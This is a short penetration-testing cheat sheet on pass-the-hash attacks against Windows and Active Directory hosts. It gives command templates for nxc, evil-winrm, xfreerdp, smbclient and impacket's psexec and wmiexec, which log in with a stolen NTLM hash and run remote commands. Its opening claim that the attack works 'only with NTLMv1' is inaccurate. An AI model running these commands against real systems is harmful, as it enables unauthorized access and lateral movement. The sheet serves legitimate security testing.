Pass The Hash

Only with NTLMv1.

It consists of passing hashes as passwords to log in, which is useful when password cracking has failed. It can be done on an Active Directory domain or on local accounts without passing the domain.

Tools
Details

nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND> nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>

evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>

xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution

smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>

psexec -hashes <[LMHash]:NTHash> <USER>@<IP>

wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>

Others impacket-scripts such as atexec, smbexec.

The user and hash we use for authentication must have administrative rights on the target computer, but if LocalAccountTokenFilterPolicy is set then only RID-500, “Administrator,” can perform remote administration tasks, if FilterAdministratorToken is also set neither can he. These settings are only for local administrative accounts.

Last updated